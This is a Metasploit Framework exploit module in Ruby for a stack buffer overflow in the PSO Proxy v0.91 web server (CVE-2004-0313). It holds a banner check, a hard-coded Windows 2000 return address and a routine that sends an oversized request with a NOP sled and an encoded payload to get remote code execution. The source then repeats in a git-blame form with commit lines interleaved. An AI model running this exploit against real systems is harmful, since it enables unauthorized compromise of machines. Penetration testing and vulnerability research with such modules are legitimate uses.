metasploit-framework/modules/exploits/windows/http/psoproxy91_overflow.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


module Msf

class Exploits::Windows::Http::PSOProxy91_Overflow < Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PSO Proxy v0.91 Stack Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
				If a client sends an excessively long request the stack is overwritten.
				You may need to rerun this exploit a few times before your payload is executed.
				This module was ported from the original exploit by rave@rosiello.org.
			},
			'Author'         => 'Patrick Webster <patrick@aushack.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
					[ 'CVE', '2004-0313' ],
					[ 'BID', '9706' ],
					[ 'OSVDB', '4028' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 350,
					'BadChars' => "\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',
					{
						'Ret' => 0x7c57b842,# jmp ecx KERNEL32.DLL w2ksp4en
					}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 20 2004',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				Opt::RPORT(8080),
			], self.class)
	end

		def check 
			connect
			sock.put("GET / HTTP/1.0\r\n\r\n")
			banner = sock.get(-1,3)
			if (banner =~ /PSO Proxy 0\.9/)
				return Exploit::CheckCode::Vulnerable
			end
			return Exploit::CheckCode::Safe
		end

		def exploit
			print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
			connect
			exploit = rand_text_alphanumeric(1024, payload_badchars) 
			exploit += [target['Ret']].pack('V') + make_nops(20) + payload.encoded
			sock.put(exploit + "\r\n\r\n")
			sleep(0.25)
			print_status("Payload sent... if it didn't work try again!")
			disconnect
			handler
		end
	end
end
New module from Patrick Webster git-svn-id: file:///home/svn/framework3/trunk@5091 4d416f70-5f16-0410-b530-b9f4589650da 2007-09-09 22:37:43 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`module Msf`

			`class Exploits::Windows::Http::PSOProxy91_Overflow < Exploit::Remote`

			`include Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'PSO Proxy v0.91 Stack Overflow',`
			`'Description' => %q{`
			`This module exploits a buffer overflow in the PSO Proxy v0.91 web server.`
			`If a client sends an excessively long request the stack is overwritten.`
			`You may need to rerun this exploit a few times before your payload is executed.`
			`This module was ported from the original exploit by rave@rosiello.org.`
			`},`
			`'Author' => 'Patrick Webster <patrick@aushack.com>',`
			`'License' => MSF_LICENSE,`
Updated svn:keywords git-svn-id: file:///home/svn/framework3/trunk@5100 4d416f70-5f16-0410-b530-b9f4589650da 2007-09-10 01:01:20 +00:00			`'Version' => '$Revision$',`
New module from Patrick Webster git-svn-id: file:///home/svn/framework3/trunk@5091 4d416f70-5f16-0410-b530-b9f4589650da 2007-09-09 22:37:43 +00:00			`'References' =>`
			`[`
			`[ 'URL', 'http://www.milw0rm.com/exploits/156' ],`
			`[ 'CVE', '2004-0313' ],`
			`[ 'BID', '9706' ],`
			`[ 'OSVDB', '4028' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 350,`
			`'BadChars' => "\x0a\x0d",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 SP4 English',`
			`{`
			`'Ret' => 0x7c57b842,# jmp ecx KERNEL32.DLL w2ksp4en`
			`}`
			`],`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Feb 20 2004',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(8080),`
			`], self.class)`
			`end`

			`def check`
			`connect`
			`sock.put("GET / HTTP/1.0\r\n\r\n")`
			`banner = sock.get(-1,3)`
			`if (banner =~ /PSO Proxy 0\.9/)`
			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")`
			`connect`
			`exploit = rand_text_alphanumeric(1024, payload_badchars)`
			`exploit += [target['Ret']].pack('V') + make_nops(20) + payload.encoded`
			`sock.put(exploit + "\r\n\r\n")`
			`sleep(0.25)`
			`print_status("Payload sent... if it didn't work try again!")`
			`disconnect`
			`handler`
			`end`
			`end`
			`end`